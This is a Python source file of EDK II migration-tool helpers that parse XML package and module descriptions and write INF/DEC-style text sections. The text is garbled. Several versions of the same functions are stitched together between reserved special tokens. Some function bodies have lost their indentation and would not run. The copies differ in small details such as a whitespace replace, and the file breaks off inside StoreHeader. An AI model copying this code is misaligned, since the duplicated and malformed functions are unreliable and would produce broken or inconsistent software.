    """Build a LibraryClassClass object from a LibraryClass XML node.

    Falls back to the node's 'Name' attribute when the Keyword element is empty.
    """
    LibraryClass = LibraryClassClass()
    XmlTag = 'LibraryClass/Keyword'
    LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)
    # Older XML layouts carry the class name as an attribute instead.
    if LibraryClass.LibraryClass == '':
        XmlTag = 'Name'
        LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)
    XmlTag = 'LibraryClass/IncludeHeader'
    LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)
    XmlTag = 'RecommendedInstanceVersion'
    RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)
    LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion
    XmlTag = 'RecommendedInstanceGuid'
    RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)
    LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid
    XmlTag = 'SupModuleList'
    SupModules = XmlAttribute(XmlLibraryClass, XmlTag)
    LibraryClass.SupModuleList = SupModules.split()
    # Fill in the attributes shared by all entry types (usage, arch list, ...).
    SetCommon(LibraryClass, XmlLibraryClass)
    return LibraryClass
def LoadBuildOption(XmlBuildOption):
    """Return a new BuildOptionClass object equivalent to XmlBuildOption"""
    BuildOption = BuildOptionClass()
    BuildOption.Option = XmlElementData(XmlBuildOption)
    BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, 'BuildTargets').split()
    BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, 'ToolChainFamily')
    BuildOption.TagName = XmlAttribute(XmlBuildOption, 'TagName')
    BuildOption.ToolCode = XmlAttribute(XmlBuildOption, 'ToolCode')
    BuildOption.SupArchList = XmlAttribute(XmlBuildOption, 'SupArchList').split()
    return BuildOption
def LoadUserExtensions(XmlUserExtensions):
    """Build a UserExtensionsClass object from a UserExtensions XML node."""
    UserExtensions = UserExtensionsClass()
    UserExtensions.UserID = XmlAttribute(XmlUserExtensions, 'UserID')
    UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, 'Identifier')
    UserExtensions.Content = XmlElementData(XmlUserExtensions)
    return UserExtensions
def StoreTextFile(TextFile, Content):
EdkLogger.verbose(Content)
TextFile.write(Content)
def AddToSection(Section, Arch, Item):
SectionArch = Section.get(Arch, [])
if Item not in SectionArch:
SectionArch.append(Item)
Section[Arch] = SectionArch
<|reserved_special_token_0|>
def StoreHeader(TextFile, CommonHeader):
    """Write the standard '#/** @file ... #**/' comment header built from
    CommonHeader's abstract/description/copyright/license to TextFile."""
    CopyRight = CommonHeader.Copyright
    Abstract = CommonHeader.Abstract
    Description = CommonHeader.Description
    License = CommonHeader.License
    Header = '#/** @file\n#\n'
    Header += '# ' + Abstract + '\n#\n'
    # Re-prefix every description line so it stays inside the comment block.
    Header += '# ' + Description.strip().replace('\n', '\n# ') + '\n'
    Header += '# ' + CopyRight + '\n#\n'
    # NOTE(review): the second replace(' ', ' ') appears to be a no-op as
    # written — presumably it originally collapsed doubled spaces; confirm
    # against the upstream source before changing it.
    Header += '# ' + License.replace('\n', '\n# ').replace(' ', ' ')
    Header += '\n#\n#**/\n\n'
    StoreTextFile(TextFile, Header)
def StoreDefinesSection(TextFile, DefinesTupleList):
    """Write a [Defines] section assembled from (name, value) tuples to TextFile."""
    Lines = ['[Defines]\n']
    for DefineItem in DefinesTupleList:
        Lines.append(' %-30s = %s\n' % DefineItem)
    Lines.append('\n\n')
    StoreTextFile(TextFile, ''.join(Lines))
def GetUserExtensions(UserExtensions):
UserId = UserExtensions.UserID
Identifier = UserExtensions.Identifier
Content = UserExtensions.Content
return '[UserExtensions.%s.%s]\n %s\n\n' % (UserId, Identifier, Content)
<|reserved_special_token_0|>
def GetTextFileInfo(FileName, TagTuple):
    """Scan a text meta-file for 'TAG = value' lines and collect the values
    for the tags named in TagTuple.

    Text after '#' on a line is ignored. Returns a list parallel to TagTuple,
    with '' for tags that are not found or when the file cannot be read.
    """
    ValueTuple = [''] * len(TagTuple)
    try:
        # BUGFIX: use 'with' so the file handle is closed (it was leaked before).
        with open(FileName) as TextFile:
            for Line in TextFile:
                Line = Line.split('#', 1)[0]
                MatchEquation = mReEquation.match(Line)
                if MatchEquation:
                    Tag = MatchEquation.group(1).upper()
                    Value = MatchEquation.group(2)
                    for Index in range(len(TagTuple)):
                        if TagTuple[Index] == Tag:
                            ValueTuple[Index] = Value
    except OSError:
        # BUGFIX: narrowed from a bare 'except:' that also silently swallowed
        # programming errors and KeyboardInterrupt; only I/O failures are expected.
        EdkLogger.info('IO Error in reading file %s' % FileName)
    return ValueTuple
def GetXmlFileInfo(FileName, TagTuple):
XmlDom = XmlParseFile(FileName)
return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):
    """Parse the command line shared by the EDK migration tools.

    Returns (Options, InputFile); raises MigrationError for a missing input
    file or a bad option combination (-o with -a, or neither).
    """
    UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName
    Version = '%s Version %.2f' % (ToolName, VersionNumber)
    Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'
    Parser = OptionParser(description=Copyright, version=Version, usage=
        UsageString)
    Parser.add_option('-o', '--output', dest='OutputFile', help=
        'The name of the %s file to be created.' % Destinate)
    Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',
        default=False, help=
        'Automatically create the %s file using the name of the %s file and replacing file extension'
         % (Source, Destinate))
    Parser.add_option('-q', '--quiet', action='store_true', type=None, help
        ='Disable all messages except FATAL ERRORS.')
    Parser.add_option('-v', '--verbose', action='store_true', type=None,
        help='Turn on verbose output with informational messages printed.')
    Options, Args = Parser.parse_args()
    # Logging level: -v wins over -q when both are supplied.
    if Options.verbose:
        EdkLogger.setLevel(EdkLogger.VERBOSE)
    elif Options.quiet:
        EdkLogger.setLevel(EdkLogger.QUIET)
    else:
        EdkLogger.setLevel(EdkLogger.INFO)
    # Exactly one positional input file is required and must exist.
    if len(Args) == 0:
        raise MigrationError(PARAMETER_MISSING, name='Input file', usage=
            Parser.get_usage())
    if len(Args) > 1:
        raise MigrationError(PARAMETER_INVALID, name='Too many input files',
            usage=Parser.get_usage())
    InputFile = Args[0]
    if not os.path.exists(InputFile):
        raise MigrationError(FILE_NOT_FOUND, name=InputFile)
    # -o and -a conflict; with -a the output name is derived from the input.
    if Options.OutputFile:
        if Options.AutoWrite:
            raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',
                usage=Parser.get_usage())
    elif Options.AutoWrite:
        Options.OutputFile = os.path.splitext(InputFile)[0
            ] + '.' + Destinate.lower()
    else:
        raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.
            get_usage())
    return Options, InputFile
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def SetCommon(Common, XmlCommon):
    """Set Usage/FeatureFlag/SupArchList/HelpText of Common from an XML node."""
    XmlTag = 'Usage'
    Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()
    XmlTag = 'FeatureFlag'
    Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)
    XmlTag = 'SupArchList'
    Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()
    # HelpText is a child element named after the node's own tag.
    XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'
    Common.HelpText = XmlElement(XmlCommon, XmlTag)
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
    """Set Name/Guid/Version and file-path fields of CommonHeader from an XML node."""
    XmlParentTag = XmlNodeName(XmlCommonHeader)
    XmlTag = XmlParentTag + '/' + NameTag
    CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParentTag + '/' + 'GuidValue'
    CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParentTag + '/' + 'Version'
    CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)
    # Keep both the bare name and the absolute path of the source XML file.
    CommonHeader.FileName = os.path.basename(FileName)
    CommonHeader.FullPath = os.path.abspath(FileName)
<|reserved_special_token_0|>
def AddToSpecificationDict(SpecificationDict, SpecificationString):
    """Abstract specification name, value pair from Specification String"""
    # Each "<name> <value>" pair found by mReSpecification becomes a dict entry.
    for SpecificationMatch in mReSpecification.finditer(SpecificationString):
        Specification = SpecificationMatch.group('Specification')
        Value = SpecificationMatch.group('Value')
        SpecificationDict[Specification] = Value
def SetCommonHeader(CommonHeader, XmlCommonHeader):
    """Set all attributes of CommonHeaderClass object from XmlCommonHeader"""
    XmlParent = XmlNodeName(XmlCommonHeader)
    XmlTag = XmlParent + '/' + 'Abstract'
    CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParent + '/' + 'Description'
    CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParent + '/' + 'Copyright'
    CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)
    XmlTag = XmlParent + '/' + 'License'
    CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)
    # Specification is a "<name> <value>" list folded into a dictionary.
    XmlTag = XmlParent + '/' + 'Specification'
    Specification = XmlElement(XmlCommonHeader, XmlTag)
    AddToSpecificationDict(CommonHeader.Specification, Specification)
    XmlTag = XmlParent + '/' + 'ModuleType'
    CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)
def LoadClonedRecord(XmlCloned):
    """Build a ClonedRecordClass object from an XML <Cloned> DOM node."""
    ClonedRecord = ClonedRecordClass()
    XmlTag = 'Id'
    ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))
    XmlTag = 'FarGuid'
    ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)
    XmlTag = 'Cloned/PackageGuid'
    ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)
    XmlTag = 'Cloned/PackageVersion'
    ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)
    XmlTag = 'Cloned/ModuleGuid'
    ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)
    XmlTag = 'Cloned/ModuleVersion'
    ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)
    return ClonedRecord
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
    """Build a GuidProtocolPpiCommonClass object from a Guid/Protocol/Ppi node."""
    GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
    XmlTag = 'Name'
    GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
    # The C-name child element is spelled differently per parent node type.
    if XmlParent == 'Entry':
        XmlTag = '%s/C_Name' % XmlParent
    elif XmlParent == 'GuidCNames':
        XmlTag = '%s/GuidCName' % XmlParent
    else:
        XmlTag = '%s/%sCName' % (XmlParent, XmlParent)
    GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
    XmlTag = XmlParent + '/' + 'GuidValue'
    GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
    # A "...Notify" parent marks this record as a notification registration.
    if XmlParent.endswith('Notify'):
        GuidProtocolPpiCommon.Notify = True
    XmlTag = 'GuidTypeList'
    GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
    XmlTag = 'SupModuleList'
    SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    GuidProtocolPpiCommon.SupModuleList = SupModules.split()
    SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
    return GuidProtocolPpiCommon
def LoadPcd(XmlPcd):
    """Return a new PcdClass object equivalent to XmlPcd"""
    Pcd = PcdClass()
    XmlTag = 'PcdEntry/C_Name'
    Pcd.CName = XmlElement(XmlPcd, XmlTag)
    XmlTag = 'PcdEntry/Token'
    Pcd.Token = XmlElement(XmlPcd, XmlTag)
    XmlTag = 'PcdEntry/TokenSpaceGuidCName'
    Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)
    XmlTag = 'PcdEntry/DatumType'
    Pcd.DatumType = XmlElement(XmlPcd, XmlTag)
    XmlTag = 'PcdEntry/MaxDatumSize'
    Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)
    XmlTag = 'PcdEntry/DefaultValue'
    Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)
    # ItemType is an attribute of the node, not a child element.
    XmlTag = 'PcdItemType'
    Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)
    XmlTag = 'PcdEntry/ValidUsage'
    Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()
    XmlTag = 'SupModuleList'
    Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()
    SetCommon(Pcd, XmlPcd)
    return Pcd
def LoadLibraryClass(XmlLibraryClass):
    """Build a LibraryClassClass object from an XML <LibraryClass> DOM node."""
    LibraryClass = LibraryClassClass()
    XmlTag = 'LibraryClass/Keyword'
    LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)
    if LibraryClass.LibraryClass == '':
        # Fall back to the Name attribute when no Keyword child exists.
        XmlTag = 'Name'
        LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)
    XmlTag = 'LibraryClass/IncludeHeader'
    LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)
    XmlTag = 'RecommendedInstanceVersion'
    RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)
    LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion
    XmlTag = 'RecommendedInstanceGuid'
    RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)
    LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid
    XmlTag = 'SupModuleList'
    SupModules = XmlAttribute(XmlLibraryClass, XmlTag)
    LibraryClass.SupModuleList = SupModules.split()
    SetCommon(LibraryClass, XmlLibraryClass)
    return LibraryClass
def LoadBuildOption(XmlBuildOption):
    """Return a new BuildOptionClass object equivalent to XmlBuildOption"""
    BuildOption = BuildOptionClass()
    # The option text itself is the element's character data.
    BuildOption.Option = XmlElementData(XmlBuildOption)
    XmlTag = 'BuildTargets'
    BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()
    XmlTag = 'ToolChainFamily'
    BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)
    XmlTag = 'TagName'
    BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)
    XmlTag = 'ToolCode'
    BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)
    XmlTag = 'SupArchList'
    BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()
    return BuildOption
def LoadUserExtensions(XmlUserExtensions):
    """Build a UserExtensionsClass object from an XML <UserExtensions> node."""
    UserExtensions = UserExtensionsClass()
    XmlTag = 'UserID'
    UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)
    XmlTag = 'Identifier'
    UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)
    # The free-form payload is the raw element content.
    UserExtensions.Content = XmlElementData(XmlUserExtensions)
    return UserExtensions
def StoreTextFile(TextFile, Content):
    """Write Content to the already-open TextFile, echoing it to the verbose log."""
    EdkLogger.verbose(Content)
    TextFile.write(Content)
def AddToSection(Section, Arch, Item):
    """Add Item to Section[Arch] (a dict of arch -> item list), skipping duplicates."""
    SectionArch = Section.get(Arch, [])
    if Item not in SectionArch:
        SectionArch.append(Item)
    Section[Arch] = SectionArch
def GetSection(SectionName, Method, ObjectList):
    """Render an INF/DEC-style section string grouped by architecture.

    Method extracts the item text from each object; empty items are skipped.
    Objects with an empty SupArchList are filed under "common".
    """
    SupportedArches = ['common', 'Ia32', 'X64', 'Ipf', 'Ebc', 'ARM', 'AARCH64']
    SectionDict = {}
    for Object in ObjectList:
        Item = Method(Object)
        if Item == '':
            continue
        Item = '  %s' % Item
        Arches = Object.SupArchList
        if len(Arches) == 0:
            AddToSection(SectionDict, 'common', Item)
        else:
            for Arch in SupportedArches:
                if Arch.upper() in Arches:
                    AddToSection(SectionDict, Arch, Item)
    # Emit one "[Name.Arch]" block per populated architecture, in fixed order.
    Section = ''
    for Arch in SupportedArches:
        SectionArch = '\n'.join(SectionDict.get(Arch, []))
        if SectionArch != '':
            Section += '[%s.%s]\n%s\n' % (SectionName, Arch, SectionArch)
            Section += '\n'
    if Section != '':
        Section += '\n'
    return Section
def StoreHeader(TextFile, CommonHeader):
    """Write the standard EDK II '#/** @file' comment header to TextFile."""
    CopyRight = CommonHeader.Copyright
    Abstract = CommonHeader.Abstract
    Description = CommonHeader.Description
    License = CommonHeader.License
    Header = '#/** @file\n#\n'
    Header += '# ' + Abstract + '\n#\n'
    # Multi-line fields are re-prefixed with the '# ' comment lead.
    Header += '# ' + Description.strip().replace('\n', '\n# ') + '\n'
    Header += '# ' + CopyRight + '\n#\n'
    Header += '# ' + License.replace('\n', '\n# ').replace('  ', ' ')
    Header += '\n#\n#**/\n\n'
    StoreTextFile(TextFile, Header)
def StoreDefinesSection(TextFile, DefinesTupleList):
    """Write a [Defines] section built from (name, value) tuples to TextFile."""
    Section = '[Defines]\n'
    for DefineItem in DefinesTupleList:
        Section += '  %-30s = %s\n' % DefineItem
    Section += '\n\n'
    StoreTextFile(TextFile, Section)
def GetUserExtensions(UserExtensions):
    """Render a UserExtensionsClass object as a [UserExtensions.*.*] section."""
    UserId = UserExtensions.UserID
    Identifier = UserExtensions.Identifier
    Content = UserExtensions.Content
    return '[UserExtensions.%s.%s]\n  %s\n\n' % (UserId, Identifier, Content)
<|reserved_special_token_0|>
def GetTextFileInfo(FileName, TagTuple):
    """Scan a text file for "tag = value" lines matching the upper-case tags
    in TagTuple; return one value per tag ('' when absent).  '#' starts a
    comment.
    """
    ValueTuple = [''] * len(TagTuple)
    try:
        for Line in open(FileName):
            Line = Line.split('#', 1)[0]
            MatchEquation = mReEquation.match(Line)
            if MatchEquation:
                Tag = MatchEquation.group(1).upper()
                Value = MatchEquation.group(2)
                for Index in range(len(TagTuple)):
                    if TagTuple[Index] == Tag:
                        ValueTuple[Index] = Value
    # NOTE(review): bare except also hides non-I/O bugs, and the file handle
    # is never closed; consider except EnvironmentError plus a finally/close.
    except:
        EdkLogger.info('IO Error in reading file %s' % FileName)
    return ValueTuple
def GetXmlFileInfo(FileName, TagTuple):
    """Return a tuple of element values, one for each XML tag in TagTuple."""
    XmlDom = XmlParseFile(FileName)
    return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):
    """Parse the command line shared by the EDK migration tools.

    Returns (Options, InputFile); raises MigrationError for a missing input
    file or a bad option combination (-o with -a, or neither).
    """
    UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName
    Version = '%s Version %.2f' % (ToolName, VersionNumber)
    Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'
    Parser = OptionParser(description=Copyright, version=Version, usage=
        UsageString)
    Parser.add_option('-o', '--output', dest='OutputFile', help=
        'The name of the %s file to be created.' % Destinate)
    Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',
        default=False, help=
        'Automatically create the %s file using the name of the %s file and replacing file extension'
         % (Source, Destinate))
    Parser.add_option('-q', '--quiet', action='store_true', type=None, help
        ='Disable all messages except FATAL ERRORS.')
    Parser.add_option('-v', '--verbose', action='store_true', type=None,
        help='Turn on verbose output with informational messages printed.')
    Options, Args = Parser.parse_args()
    # Logging level: -v wins over -q when both are supplied.
    if Options.verbose:
        EdkLogger.setLevel(EdkLogger.VERBOSE)
    elif Options.quiet:
        EdkLogger.setLevel(EdkLogger.QUIET)
    else:
        EdkLogger.setLevel(EdkLogger.INFO)
    # Exactly one positional input file is required and must exist.
    if len(Args) == 0:
        raise MigrationError(PARAMETER_MISSING, name='Input file', usage=
            Parser.get_usage())
    if len(Args) > 1:
        raise MigrationError(PARAMETER_INVALID, name='Too many input files',
            usage=Parser.get_usage())
    InputFile = Args[0]
    if not os.path.exists(InputFile):
        raise MigrationError(FILE_NOT_FOUND, name=InputFile)
    # -o and -a conflict; with -a the output name is derived from the input.
    if Options.OutputFile:
        if Options.AutoWrite:
            raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',
                usage=Parser.get_usage())
    elif Options.AutoWrite:
        Options.OutputFile = os.path.splitext(InputFile)[0
            ] + '.' + Destinate.lower()
    else:
        raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.
            get_usage())
    return Options, InputFile
# Library module of shared migration helpers: nothing to run standalone.
if __name__ == '__main__':
    pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def SetCommon(Common, XmlCommon):
    """Populate the shared CommonClass attributes of Common from an XML node.

    Usage and SupArchList are whitespace-separated attribute lists; HelpText
    is read from a child element named after the node itself.
    """
    Common.Usage = XmlAttribute(XmlCommon, 'Usage').split()
    Common.FeatureFlag = XmlAttribute(XmlCommon, 'FeatureFlag')
    Common.SupArchList = XmlAttribute(XmlCommon, 'SupArchList').split()
    # The HelpText element path depends on the node's own tag name.
    HelpTextTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'
    Common.HelpText = XmlElement(XmlCommon, HelpTextTag)
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
    """Fill the identification fields (Name, Guid, Version, paths) of a header.

    NameTag selects which child element carries the name; FileName is the XML
    file the header was loaded from.
    """
    Parent = XmlNodeName(XmlCommonHeader)
    CommonHeader.Name = XmlElement(XmlCommonHeader, Parent + '/' + NameTag)
    CommonHeader.Guid = XmlElement(XmlCommonHeader, Parent + '/' + 'GuidValue')
    CommonHeader.Version = XmlElement(XmlCommonHeader, Parent + '/' + 'Version')
    # Keep both the bare name and the absolute path for later reporting.
    CommonHeader.FileName = os.path.basename(FileName)
    CommonHeader.FullPath = os.path.abspath(FileName)
# Matches "<SpecName> <Value>" pairs inside a specification string.
mReSpecification = re.compile(r'(?P<Specification>\w+)\s+(?P<Value>\w*)')
def AddToSpecificationDict(SpecificationDict, SpecificationString):
    """Parse name/value pairs out of SpecificationString into the dict."""
    for Match in mReSpecification.finditer(SpecificationString):
        SpecificationDict[Match.group('Specification')] = Match.group('Value')
def SetCommonHeader(CommonHeader, XmlCommonHeader):
    """Set all attributes of CommonHeaderClass object from XmlCommonHeader"""
    Parent = XmlNodeName(XmlCommonHeader)
    # Plain text children are copied straight onto same-named attributes.
    for FieldName in ('Abstract', 'Description', 'Copyright', 'License'):
        setattr(CommonHeader, FieldName,
                XmlElement(XmlCommonHeader, Parent + '/' + FieldName))
    # Specification is a "<name> <value>" list folded into a dictionary.
    Specification = XmlElement(XmlCommonHeader, Parent + '/' + 'Specification')
    AddToSpecificationDict(CommonHeader.Specification, Specification)
    CommonHeader.ModuleType = XmlElement(XmlCommonHeader, Parent + '/' + 'ModuleType')
def LoadClonedRecord(XmlCloned):
    """Build a ClonedRecordClass object from an XML <Cloned> DOM node."""
    Record = ClonedRecordClass()
    # Id and FarGuid come from attributes of the node itself.
    Record.Id = int(XmlAttribute(XmlCloned, 'Id'))
    Record.FarGuid = XmlAttribute(XmlCloned, 'FarGuid')
    # Child elements identify the package/module the record was cloned from.
    Record.PackageGuid = XmlElement(XmlCloned, 'Cloned/PackageGuid')
    Record.PackageVersion = XmlElement(XmlCloned, 'Cloned/PackageVersion')
    Record.ModuleGuid = XmlElement(XmlCloned, 'Cloned/ModuleGuid')
    Record.ModuleVersion = XmlElement(XmlCloned, 'Cloned/ModuleVersion')
    return Record
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
    """Build a GuidProtocolPpiCommonClass object from a Guid/Protocol/Ppi node."""
    Common = GuidProtocolPpiCommonClass()
    Common.Name = XmlAttribute(XmlGuidProtocolPpiCommon, 'Name')
    Parent = XmlNodeName(XmlGuidProtocolPpiCommon)
    # The C-name child element is spelled differently per parent node type.
    if Parent == 'Entry':
        CNameTag = '%s/C_Name' % Parent
    elif Parent == 'GuidCNames':
        CNameTag = '%s/GuidCName' % Parent
    else:
        CNameTag = '%s/%sCName' % (Parent, Parent)
    Common.CName = XmlElement(XmlGuidProtocolPpiCommon, CNameTag)
    Common.Guid = XmlElement(XmlGuidProtocolPpiCommon, Parent + '/' + 'GuidValue')
    # A "...Notify" parent marks this record as a notification registration.
    if Parent.endswith('Notify'):
        Common.Notify = True
    Common.GuidTypeList = XmlAttribute(XmlGuidProtocolPpiCommon,
                                       'GuidTypeList').split()
    Common.SupModuleList = XmlAttribute(XmlGuidProtocolPpiCommon,
                                        'SupModuleList').split()
    SetCommon(Common, XmlGuidProtocolPpiCommon)
    return Common
def LoadPcd(XmlPcd):
    """Return a new PcdClass object equivalent to XmlPcd"""
    Pcd = PcdClass()
    # Plain text children of the <PcdEntry> element.
    Pcd.CName = XmlElement(XmlPcd, 'PcdEntry/C_Name')
    Pcd.Token = XmlElement(XmlPcd, 'PcdEntry/Token')
    Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, 'PcdEntry/TokenSpaceGuidCName')
    Pcd.DatumType = XmlElement(XmlPcd, 'PcdEntry/DatumType')
    Pcd.MaxDatumSize = XmlElement(XmlPcd, 'PcdEntry/MaxDatumSize')
    Pcd.DefaultValue = XmlElement(XmlPcd, 'PcdEntry/DefaultValue')
    # ItemType is an attribute of the node, not a child element.
    Pcd.ItemType = XmlAttribute(XmlPcd, 'PcdItemType')
    # List-valued fields are whitespace separated.
    Pcd.ValidUsage = XmlElement(XmlPcd, 'PcdEntry/ValidUsage').split()
    Pcd.SupModuleList = XmlAttribute(XmlPcd, 'SupModuleList').split()
    SetCommon(Pcd, XmlPcd)
    return Pcd
def LoadLibraryClass(XmlLibraryClass):
    """Build a LibraryClassClass object from an XML <LibraryClass> DOM node."""
    LibraryClass = LibraryClassClass()
    LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, 'LibraryClass/Keyword')
    if LibraryClass.LibraryClass == '':
        # Fall back to the Name attribute when no Keyword child exists.
        LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, 'Name')
    LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass,
                                            'LibraryClass/IncludeHeader')
    LibraryClass.RecommendedInstanceVersion = XmlAttribute(
        XmlLibraryClass, 'RecommendedInstanceVersion')
    LibraryClass.RecommendedInstanceGuid = XmlAttribute(
        XmlLibraryClass, 'RecommendedInstanceGuid')
    LibraryClass.SupModuleList = XmlAttribute(XmlLibraryClass,
                                              'SupModuleList').split()
    SetCommon(LibraryClass, XmlLibraryClass)
    return LibraryClass
def LoadBuildOption(XmlBuildOption):
    """Return a new BuildOptionClass object equivalent to XmlBuildOption"""
    BuildOption = BuildOptionClass()
    # The option text itself is the element's character data.
    BuildOption.Option = XmlElementData(XmlBuildOption)
    # Everything else lives in attributes; lists are whitespace separated.
    BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, 'BuildTargets').split()
    BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, 'ToolChainFamily')
    BuildOption.TagName = XmlAttribute(XmlBuildOption, 'TagName')
    BuildOption.ToolCode = XmlAttribute(XmlBuildOption, 'ToolCode')
    BuildOption.SupArchList = XmlAttribute(XmlBuildOption, 'SupArchList').split()
    return BuildOption
def LoadUserExtensions(XmlUserExtensions):
    """Build a UserExtensionsClass object from an XML <UserExtensions> node."""
    Extensions = UserExtensionsClass()
    Extensions.UserID = XmlAttribute(XmlUserExtensions, 'UserID')
    Extensions.Identifier = XmlAttribute(XmlUserExtensions, 'Identifier')
    # The free-form payload is the raw element content.
    Extensions.Content = XmlElementData(XmlUserExtensions)
    return Extensions
def StoreTextFile(TextFile, Content):
    """Write Content to the already-open TextFile, echoing it to the verbose log."""
    EdkLogger.verbose(Content)
    TextFile.write(Content)
def AddToSection(Section, Arch, Item):
    """Add Item to Section[Arch], creating the list on first use.

    Section maps an architecture name to the list of items collected for it.
    Duplicate items are silently skipped.  Using dict.setdefault both creates
    and fetches the list in one step, so no re-assignment back into the
    dictionary is needed (the original get/append/store dance).
    """
    SectionArch = Section.setdefault(Arch, [])
    if Item not in SectionArch:
        SectionArch.append(Item)
def GetSection(SectionName, Method, ObjectList):
    """Render an INF/DEC-style section string grouped by architecture.

    Method extracts the item text from each object; objects yielding an empty
    string are skipped.  Objects with an empty SupArchList are filed under
    "common"; otherwise they are filed under each supported arch they list.
    """
    SupportedArches = ['common', 'Ia32', 'X64', 'Ipf', 'Ebc', 'ARM', 'AARCH64']
    SectionDict = {}
    def Collect(Arch, Item):
        # Duplicate-free append into the per-arch bucket (inlined AddToSection).
        Bucket = SectionDict.setdefault(Arch, [])
        if Item not in Bucket:
            Bucket.append(Item)
    for Object in ObjectList:
        Item = Method(Object)
        if Item == '':
            continue
        Item = '  %s' % Item
        Arches = Object.SupArchList
        if len(Arches) == 0:
            Collect('common', Item)
        else:
            for Arch in SupportedArches:
                if Arch.upper() in Arches:
                    Collect(Arch, Item)
    # Emit one "[Name.Arch]" block per populated architecture, in fixed order.
    Parts = []
    for Arch in SupportedArches:
        Body = '\n'.join(SectionDict.get(Arch, []))
        if Body != '':
            Parts.append('[%s.%s]\n%s\n' % (SectionName, Arch, Body))
            Parts.append('\n')
    Section = ''.join(Parts)
    if Section != '':
        Section += '\n'
    return Section
def StoreHeader(TextFile, CommonHeader):
